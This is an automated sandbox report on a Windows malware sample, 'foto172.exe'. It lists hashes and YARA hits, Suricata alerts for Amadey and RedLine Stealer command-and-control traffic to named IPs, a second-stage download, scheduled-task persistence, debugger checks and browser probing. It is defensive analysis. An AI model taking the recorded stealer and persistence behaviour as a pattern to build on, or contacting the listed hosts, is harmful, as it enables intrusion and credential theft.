popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

foto172.exe

Emotet Gen1 SmokeLoader UPX Malicious Library Malicious Packer Admin Tool (Sysinternals etc ...) CAB PE File OS Processor Check PE32 .NET EXE DLL
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us June 27, 2023, 7:30 a.m. June 27, 2023, 7:34 a.m.
Size 497.3KB
Type PE32 executable (console) Intel 80386, for MS Windows
MD5 e609d62d8d48da3d205b632cd2fc52e8
SHA256 c475ad88a8be90ba3e04a8918cc1a9380252e0781744e5c6412751dda1adc032
CRC32 88E10FC2
ssdeep 6144:fdHpZSe0q6Zwh24HVvsrln+y1gDhN41TkLIsOk28joWyoW2sH98COzY8POERnLqn:z4e03zPiDhN475Dd8PNL1/xmdAqnwzk
Yara
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
77.91.68.63 Active Moloch
83.97.73.129 Active Moloch
83.97.73.131 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49174 -> 77.91.68.63:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 77.91.68.63:80 2044695 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M1 A Network Trojan was detected
TCP 192.168.56.103:49174 -> 77.91.68.63:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043233 ET MALWARE RedLine Stealer TCP CnC net.tcp Init A Network Trojan was detected
TCP 192.168.56.103:49174 -> 77.91.68.63:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 83.97.73.131:19071 -> 192.168.56.103:49183 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043233 ET MALWARE RedLine Stealer TCP CnC net.tcp Init A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043233 ET MALWARE RedLine Stealer TCP CnC net.tcp Init A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 83.97.73.131:19071 -> 192.168.56.103:49193 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 83.97.73.131:19071 -> 192.168.56.103:49164 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 83.97.73.131:19071 -> 192.168.56.103:49193 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 83.97.73.131:19071 -> 192.168.56.103:49164 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49174 -> 77.91.68.63:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49174 -> 77.91.68.63:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49193 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49183 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49164 -> 83.97.73.131:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49179 -> 83.97.73.129:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 83.97.73.129:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 83.97.73.129:80 -> 192.168.56.103:49179 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 83.97.73.129:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 83.97.73.129:80 -> 192.168.56.103:49179 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 192.168.56.103:49179 -> 83.97.73.129:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 83.97.73.129:80 -> 192.168.56.103:49179 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 83.97.73.129:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 83.97.73.129:80 -> 192.168.56.103:49179 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 192.168.56.103:49179 -> 83.97.73.129:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 83.97.73.129:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 83.97.73.129:80 -> 192.168.56.103:49179 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 83.97.73.129:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 77.91.68.63:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 77.91.68.63:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 77.91.68.63:80 -> 192.168.56.103:49195 2014819 ET INFO Packed Executable Download Misc activity
TCP 77.91.68.63:80 -> 192.168.56.103:49195 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 77.91.68.63:80 -> 192.168.56.103:49195 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 77.91.68.63:80 -> 192.168.56.103:49195 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

 buffer: alice sosalpbrqwzjkakjsak
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: alice sosalpbrqwzjkakjsak
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "rugen.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003477f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003477f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003477f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003477f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00347870
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00347870
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00347770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00347770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00347770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00347770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00347770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003477f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003477f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003479f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00348130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00348130
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00347ff0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00548740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00548740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00548740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00548740
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005486c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005486c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005486c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005486c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005486c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005486c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005486c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00548780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00548780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00548940
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00549080
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00549080
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00548f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bcf0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bcf0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bcf0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bcf0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bd70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bd70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bc70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bc70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bc70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bc70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bc70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bcf0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bcf0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055bef0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055c630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0055c630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0x495d2c1
0x495d0c3
0x4957710
0x4956f0b
0x4953c6b
0x49535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
